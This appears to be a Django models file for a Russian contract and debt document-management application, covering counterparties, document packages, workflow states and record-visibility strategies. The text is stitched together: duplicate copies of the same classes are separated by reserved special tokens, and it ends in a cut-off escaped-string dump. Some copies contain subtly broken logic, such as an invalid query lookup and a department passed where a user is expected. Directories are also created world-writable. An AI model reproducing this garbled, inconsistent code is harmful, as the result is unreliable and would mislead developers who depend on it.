verbose_name_plural = 'Номера договоров'
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = 'Номера документов'
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Города'
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента', choices=
KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel', verbose_name=
'Тип документа', on_delete=models.CASCADE)
def __str__(self):
return (
f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'
)
class Meta:
verbose_name_plural = 'Шаблоны документов'
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255, null=True,
blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = 'Типы документов'
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы', related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние', default=False
)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return user.is_superuser or user.is_staff or self._is_dept_permitted(
user.department)
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние', blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние', blank=True, null=True,
related_name='end_states')
is_move_backward = models.BooleanField('Двигаемся обратно назад',
default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if not res.active_package else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.filter(current_user__contain=user)
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk, current_user__contain=user)
except Contragent.DoesNotExist:
return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user.department):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [(c.department == user.department) for c in
contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and user in c.current_user:
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user
) and user in contragent.current_user:
return contragent
return contragent
except Contragent.DoesNotExist:
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import datetime
import os
import uuid
from abc import ABC, abstractmethod
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.contenttypes.fields import (GenericForeignKey,
GenericRelation)
from django.contrib.contenttypes.models import ContentType
from django.db import models
from bluebird.templatetags.template_extra_filters import (plur_form,
proper_last_name)
from bluebird.tasks import calc_create_gen_async
from django_q.tasks import async_task
from .snippets import str_add_app, KLASS_TYPES, DOC_TYPE
NORM_TYPE = [
(0, '1 м2 общей площади'),
(1, '1 место'),
(2, '1 человек'),
]
POST_TYPE = [
(0, 'Клиент-менеджер'),
(1, 'Старший менеджер по работе с ЮЛ'),
(2, 'Менеджер'),
]
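# Both lists follow Django's `choices` convention: (stored integer value,
# human-readable label) pairs, consumed by the IntegerField declarations
# below. Illustrative read-back for a saved row (object name assumed):
#
#     signer = SignUser.objects.first()
#     POST_TYPE[signer.position][1]      # e.g. 'Менеджер'
#     signer.get_position_display()      # Django's built-in equivalent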
class Adress(models.Model):
state = models.CharField(verbose_name="Область", max_length=255)
city = models.CharField(verbose_name="Город", max_length=255)
street = models.CharField(verbose_name="Улица", max_length=255)
block = models.CharField(verbose_name="Номер дома", max_length=10)
class ContragentClass(models.Model):
name = models.CharField('Наименование', max_length=255)
class Contragent(models.Model):
"""
Класс Контрагента.
"""
# klass = models.ForeignKey(ContragentClass, on_delete=models.CASCADE)
klass = models.IntegerField(choices=KLASS_TYPES, default=0)
    excell_name = models.CharField('Наименование контрагента (из Excel)',
max_length=255)
dadata_name = models.CharField('Наименование контрагента (из Dadata)',
max_length=255, blank=True, null=True)
    debt = models.FloatField('Сумма задолженности', default=0.00)
debt_period = models.IntegerField('Количество неоплаченных периодов, мес.',
blank=True, null=True)
inn = models.BigIntegerField('ИНН контрагента', blank=True, null=True)
ogrn = models.BigIntegerField('ОГРН контрагента', blank=True, null=True)
kpp = models.BigIntegerField('КПП контрагента', blank=True, null=True)
rs = models.CharField('Р/с', max_length=255, blank=True, null=True)
ks = models.CharField('К/с', max_length=255, blank=True, null=True)
bank = models.CharField('Наименование банка', max_length=255, blank=True,
null=True)
bik = models.CharField('БИК', max_length=255, blank=True, null=True)
opf = models.CharField('ОПФ', max_length=255, blank=True, null=True)
director_status = models.CharField('Директор (физ. лицо либо юр. лицо)',
max_length=255, blank=True, null=True)
director_name = models.CharField('Имя либо иное наименование директора',
max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания контрагента (юл)',
blank=True, null=True)
is_func = models.BooleanField('Признак активности контрагента',
default=True)
okved = models.CharField('ОКВЭД',
max_length=255, blank=True, null=True)
# TODO REWORK THIS AREA
    physical_address = models.CharField('Физический адрес',
                                        max_length=255)
    legal_address = models.CharField('Юридический адрес',
                                     max_length=255, blank=True, null=True)
# END OF REWORK
norm_value = models.ForeignKey('NormativeCategory',
related_name='normatives',
on_delete=models.CASCADE,
blank=True, null=True)
stat_value = models.FloatField('Показатель', blank=True, null=True)
contract_accept_date = models.DateField(
'Дата начала оказания услуг',
default=datetime.date.fromisoformat('2018-07-01'),
blank=True, null=True
)
current_date = models.DateField('Конечная дата оказания услуг',
default=datetime.date.today, blank=True,
null=True)
number_contract = models.OneToOneField('ContractNumberClass',
on_delete=models.CASCADE,
max_length=255,
blank=True, null=True)
current_contract_date = models.DateField('Дата заключения договора',
blank=True, null=True)
signed_user = models.ForeignKey('SignUser', blank=True, null=True,
on_delete=models.CASCADE,
related_name='signed')
platform = models.IntegerField('№ площадки',
blank=True, null=True)
judge_link = models.CharField(verbose_name="", max_length=255,
blank=True, null=True)
fss_link = models.CharField(verbose_name="", max_length=255,
blank=True, null=True)
personal_number = models.CharField(verbose_name="Лицевой счет",
max_length=255, blank=True, null=True)
passport_number = models.CharField(verbose_name="Номер паспорта",
max_length=15, blank=True, null=True)
    passport_date = models.DateField(verbose_name="Дата выдачи паспорта",
                                     blank=True, null=True)
    passport_origin = models.CharField(verbose_name="Кем выдан паспорт",
                                       max_length=15, blank=True, null=True)
snils = models.CharField(verbose_name="СНИЛС",
max_length=15, blank=True, null=True)
def create_package_and_folder(self):
self.check_and_create_parent_folder()
if not os.path.isdir(self.get_str_as_path()):
os.mkdir(self.get_str_as_path(), mode=0o777)
def check_and_create_parent_folder(self):
if not os.path.isdir(os.path.join(settings.MEDIA_ROOT,
KLASS_TYPES[self.klass][1])):
os.mkdir(os.path.join(settings.MEDIA_ROOT,
KLASS_TYPES[self.klass][1]), mode=0o777)
def get_str_as_path(self):
return os.path.join(os.path.join(settings.MEDIA_ROOT,
KLASS_TYPES[self.klass][1]),
f'{self.pk} {self.excell_name}')
@property
def current_user(self):
package = self.get_active_package()
if package:
            return [user for user in package.package_users.all()
                    if package.package_state.is_permitted(user)]
return None
@current_user.setter
def current_user(self, user):
package = self.get_active_package()
if package and not package.is_user_in_package(user, True):
package.package_users.add(user)
package.save()
@property
def active_package(self):
return self.get_active_package()
def get_all_packages(self):
return DocumentsPackage.objects.filter(contragent=self.pk) or None
def get_active_package(self):
res = DocumentsPackage.get_active_package(self)
return res
def reset_debt(self):
self.debt = 0
self.debt_period = 0
self.save()
def __str__(self):
return f'{self.excell_name}'
class Meta:
verbose_name_plural = "Контрагенты"
class SignUser(models.Model):
    name = models.CharField('ФИО ответственного лица', max_length=255)
document = models.IntegerField('Документ основания', choices=DOC_TYPE,
default=0)
position = models.IntegerField('Должность', choices=POST_TYPE,
default=0)
doc_number = models.CharField('Номер документа', max_length=255)
doc_date = models.DateField('Дата начала действия документа')
    address = models.CharField('Адрес', max_length=255)
city = models.ForeignKey('CityModel', on_delete=models.CASCADE,
blank=True, null=True)
tel_number = models.CharField('Телефон', max_length=255, default='')
sign = models.ImageField('Подпись', upload_to='signs/',
blank=True, null=True)
def __str__(self):
# return self.name
return f"{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}"
    def save(self, *args, **kwargs):
        # On update, delete the previous sign image from disk when it is
        # being replaced; skipped on first save, when no stored row exists.
        if self.pk:
            instance = SignUser.objects.get(id=self.id)
            if self.sign != instance.sign and instance.sign:
                if os.path.exists(instance.sign.path):
                    os.remove(instance.sign.path)
        super().save(*args, **kwargs)
class Meta:
verbose_name_plural = "Отвественные лица с правом подписи"
class Commentary(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL,
on_delete=models.CASCADE, blank=True, null=True)
commentary_text = models.TextField('Комментарий', blank=True, null=True)
creation_date = models.DateTimeField('Дата создания', auto_now_add=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class AbstractFileModel(models.Model):
file_name = models.CharField('Название файла', max_length=255,
null=True, blank=True)
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания файла',
blank=True, null=True)
    # Generic relation fields: allow attaching an arbitrary number of files
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
file_type = models.ForeignKey('DocumentTypeModel',
on_delete=models.CASCADE)
    def delete(self, using=None, keep_parents=False):
        # Remove the underlying file from disk (if any) before the DB row.
        if self.file_path and os.path.exists(str_add_app(self.file_path)):
            os.remove(str_add_app(self.file_path))
        return super().delete(using=using, keep_parents=keep_parents)
class Meta:
abstract = True
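# The content_type / object_id / content_object triple above is Django's
# generic foreign key: one file table can point at any owning model. Owners
# expose the reverse side via GenericRelation (see DocumentsPackage below),
# so package.single_files.all() is equivalent to the explicit filter:
#
#     SingleFile.objects.filter(
#         content_type=ContentType.objects.get_for_model(DocumentsPackage),
#         object_id=package.pk)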
class SingleFile(AbstractFileModel):
def __str__(self):
return str(self.file_type)
class Meta:
verbose_name_plural = "Единичные файлы"
class PackFile(AbstractFileModel):
unique_number = models.ForeignKey('SyncUniqueNumber',
on_delete=models.CASCADE,
null=True, blank=True)
class Meta:
abstract = False
verbose_name_plural = "Фаилы набора"
def initialize_folder(self, path: str):
if self.file_type:
tmp_str_path = plur_form(self.file_type.doc_type)
if not os.path.isdir(f'{path}/{tmp_str_path}/'):
os.makedirs(f'{path}/{tmp_str_path}/')
        else:
            raise AttributeError('file_type is not set')
def get_files_path(self, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
self.initialize_folder(tmp_path)
return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')
def other_files_directory_path(instance, filename):
p = instance.content_object.get_save_path()
return '{0}/прочие/{1}'.format(p, filename)
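# Django calls this upload_to callable as (instance, filename); the instance
# is an OtherFile, so content_object resolves to the owning package. For a
# package stored under "<contragent dir>/<uuid>", an uploaded "report.pdf"
# would land at "<contragent dir>/<uuid>/прочие/report.pdf" (illustrative).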
class OtherFile(AbstractFileModel):
file_obj = models.FileField('Произвольные файлы',
upload_to=other_files_directory_path,
max_length=500)
commentary = GenericRelation(Commentary, related_query_name='file')
class Meta:
verbose_name_plural = "Прочие файлы"
class ActExam(models.Model):
FOLDER = 'Акт осмотра/'
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
file_name = models.CharField('Название файла', max_length=255,
null=True, blank=True)
@classmethod
def initialize_folder(cls, path: str):
tmp_path = f'{path}/{cls.FOLDER}'
if not os.path.isdir(tmp_path):
os.makedirs(tmp_path)
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
    def clear_file(self):
        # Remove the file from disk (if any) and blank the path/name fields.
        if self.file_path and os.path.exists(str_add_app(self.file_path)):
            os.remove(str_add_app(self.file_path))
        self.file_path = None
        self.file_name = None
        self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
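# Note the split above: clear_file() removes the file from disk and blanks
# the path/name fields while keeping the ActExam row reusable; delete()
# clears the file first and then removes the row itself.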
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents',
related_query_name='contragent',
null=True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True,
editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
    debt_plan = models.FloatField('Сумма задолженности (плановая)',
                                  default=0.00)
    debt_fact = models.FloatField('Сумма задолженности (фактическая)',
                                  default=0.00)
tax_count = models.FloatField('Госпошлина', default=0.00)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия',
null=True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE,
null=True, blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(),
str(self.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return (user.department in depts) or (user in users)
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
# TODO Journal log here!
self.save()
class Meta:
verbose_name_plural = "Пакеты документов"
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel',
related_name='document_type')
states = models.ForeignKey('State', related_name='states',
on_delete=models.CASCADE,
blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate',
on_delete=models.CASCADE,
blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = "Шаблоны файлов"
# class SingleFilesTemplate(models.Model):
# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
# def __str__(self):
# return KLASS_TYPES[self.contagent_type][1]
# class Meta:
# verbose_name_plural = "Шаблоны единичных файлов"
# class PackFilesTemplate(models.Model):
# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
# documents = models.ManyToManyField('DocumentTypeModel',
# related_name='document_type_pack')
# def __str__(self):
# return KLASS_TYPES[self.contagent_type][1]
# class Meta:
# verbose_name_plural = "Шаблоны наборов файлов"
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта',
max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name='normatives',
verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = "Категории нормативов"
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива',
null=True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива',
null=True, blank=True)
value = models.FloatField('Значение норматива (год.)',
null=True, blank=True)
    def __str__(self):
        # Both dates are nullable, so guard strftime against None values.
        since = self.since_date.strftime('%d.%m.%Y') if self.since_date else '—'
        up_to = self.up_to_date.strftime('%d.%m.%Y') if self.up_to_date else '—'
        return f'Норматив: {self.value}/год., действующий с {since} по {up_to}'
class Meta:
verbose_name_plural = "Нормативы"
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
def __str__(self):
return f'{self.pk:06}-{(self.date_field).year}/ТКО/01'
class Meta:
verbose_name_plural = "Сгенерированые номера договоров"
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract,
on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='',
max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool = False, exist_number: str = ''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
verbose_name_plural = "Номера договоров"
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = "Номера документов"
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = "Города"
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента',
choices=KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel',
verbose_name='Тип документа',
on_delete=models.CASCADE)
    def __str__(self):
        # The original backslash continuation inside the f-string literal
        # leaked the next line's indentation into the rendered string.
        return (f'{self.document_type}|'
                f'{KLASS_TYPES[self.contragent_type][1]}|{self.city}')
class Meta:
verbose_name_plural = "Шаблоны документов"
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255,
null=True, blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = "Типы документов"
#########
# State #
#########
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы',
related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние',
default=False)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return (user.is_superuser or user.is_staff
or self._is_dept_permitted(user.department))
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние',
blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние',
blank=True, null=True,
related_name='end_states')
    is_move_backward = models.BooleanField('Движение назад',
                                           default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
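# State-machine sketch: State rows are the nodes, Event rows the edges; the
# events available from the current package state are its outgoing edges.
# Picking the first event is illustrative — the UI chooses one in practice:
#
#     state = package.package_state
#     allowed = state.get_linked_events() if state.is_permitted(user) else []
#     event = allowed.first() if allowed else None
#     if event:
#         package.change_state_to(event.to_state, event.is_move_backward)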
##############
# Strategies #
##############
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if (not res.active_package) else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
    def execute_list_strategy(self, user):
        # '__contain' is not a valid Django lookup; membership in the
        # current_user relation is filtered by direct equality.
        contragents = Contragent.objects.filter(current_user=user)
        return contragents
    def execute_single_strategy(self, pk, user):
        try:
            return Contragent.objects.get(pk=pk, current_user=user)
        except Contragent.DoesNotExist:
            return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
                    # is_permitted expects a user (it reads user.department
                    # itself), not a department object.
                    if tmp_state.is_permitted(user):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [c.department == user.department
for c in contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and (
user in c.current_user):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
    def execute_single_strategy(self, pk, user):
        try:
            contragent = Contragent.objects.get(pk=pk)
            tmp_pack = contragent.get_active_package()
            if tmp_pack:
                tmp_state = tmp_pack.package_state
                if tmp_state:
                    if tmp_state.is_permitted(user) and (
                            user in contragent.current_user):
                        return contragent
                    return None
            # No active package (or a package without a state) counts as an
            # "empty" record and stays visible, mirroring the list strategy.
            return contragent
        except Contragent.DoesNotExist:
            return None
STRATEGIES_LIST = ['Мои записи и пустые', 'Все по отделу', 'Все',
'Только мои записи', 'Только пустые записи']
STRATEGIES_TUPLES = list(enumerate(STRATEGIES_LIST))
STRATEGIES_FUNCTIONS = [MyAndEmptyRecordsStrategy, AllInDepartmentRecords,
AllRecords, OnlyMyRecordsStrategy, OnlyEmptyRecords]
STRATEGIES = dict(zip(STRATEGIES_LIST, STRATEGIES_FUNCTIONS))
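# Dispatch sketch (request.user as the caller is an assumption): a view picks
# a strategy class by its display name and instantiates it:
#
#     strategy = STRATEGIES['Только мои записи']()
#     visible = strategy.execute_list_strategy(request.user)
#     one = strategy.execute_single_strategy(pk, request.user)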
ZIP_FILES_ACTIONS = {
0: "Скачать весь пакет",
1: "Скачать основные файлы",
2: "Скачать акты",
3: "Скачать счета",
4: "Скачать счета фактуры",
5: "Скачать прочие файлы",
}
\n pack_files - Пакет наборов файлов.\n other_files - Произвольные файлы.\n commentary - Комментарии.\n \"\"\"\n contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,\n related_name='contragents', related_query_name='contragent', null=\n True, blank=True)\n name_uuid = models.CharField('Идентификатор пакета', max_length=255,\n default=uuid.uuid4, null=True, blank=True, editable=False)\n is_active = models.BooleanField('Активный пакет', default=True)\n is_automatic = models.BooleanField('Создан автоматически', default=True)\n creation_date = models.DateField('Дата создания пакета', auto_now_add=True)\n debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)\n debt_fact = models.FloatField('Сумма задолжности (фактическая)',\n default=0.0)\n tax_count = models.FloatField('Госпошлина', default=0.0)\n package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,\n related_name='packages')\n package_state = models.ForeignKey('State', on_delete=models.CASCADE,\n null=True, blank=True)\n package_state_date = models.DateField('Дата последнего действия', null=\n True, blank=True)\n single_files = GenericRelation(SingleFile)\n pack_files = GenericRelation(PackFile)\n other_files = GenericRelation(OtherFile)\n commentary = GenericRelation(Commentary, related_query_name='package')\n act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,\n blank=True)\n\n def __str__(self):\n return f'Пакет {self.name_uuid}'\n\n def get_save_path(self):\n if self.contragent:\n return os.path.join(self.contragent.get_str_as_path(), str(self\n .name_uuid))\n else:\n return f'{self.name_uuid}'\n\n @classmethod\n def get_active_package(cls, contragent: Contragent):\n try:\n res = cls.objects.get(contragent__id=contragent.pk, is_active=True)\n return res\n except ObjectDoesNotExist:\n return None\n\n def initialize_sub_folders(self):\n os.makedirs(str(self.get_save_path()), exist_ok=True)\n\n def is_user_in_package(self, user, use_department=False):\n users = self.package_users.all()\n if use_department:\n depts = [tmp_user.department for tmp_user in users]\n return user.department in depts or user in users\n return user in users\n\n def set_inactive(self):\n self.is_active = False\n self.save()\n\n def change_state_to(self, new_state, is_backward):\n self.package_state = new_state\n self.package_state_date = datetime.date.today()\n if not is_backward:\n async_task(calc_create_gen_async, self.contragent, self, False,\n group=self.name_uuid)\n self.save()\n\n\n class Meta:\n verbose_name_plural = 'Пакеты документов'\n\n\nclass DocumentStateEntity(models.Model):\n documents = models.ManyToManyField('DocumentTypeModel', related_name=\n 'document_type')\n states = models.ForeignKey('State', related_name='states', on_delete=\n models.CASCADE, blank=True, null=True)\n template = models.ForeignKey('DocumentFileTemplate', on_delete=models.\n CASCADE, blank=True, null=True)\n\n\nclass DocumentFileTemplate(models.Model):\n contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n is_package = models.BooleanField('Набор файлов', default=False)\n\n def __str__(self):\n return KLASS_TYPES[self.contagent_type][1]\n\n\n class Meta:\n verbose_name_plural = 'Шаблоны файлов'\n\n\nclass NormativeCategory(models.Model):\n \"\"\" Класс Категории норматива \"\"\"\n name = models.CharField('Вид объекта', max_length=255)\n norm_type = models.IntegerField('Показатель расчета', default=0,\n choices=NORM_TYPE, blank=True, null=True)\n normative = models.ManyToManyField('Normative', 
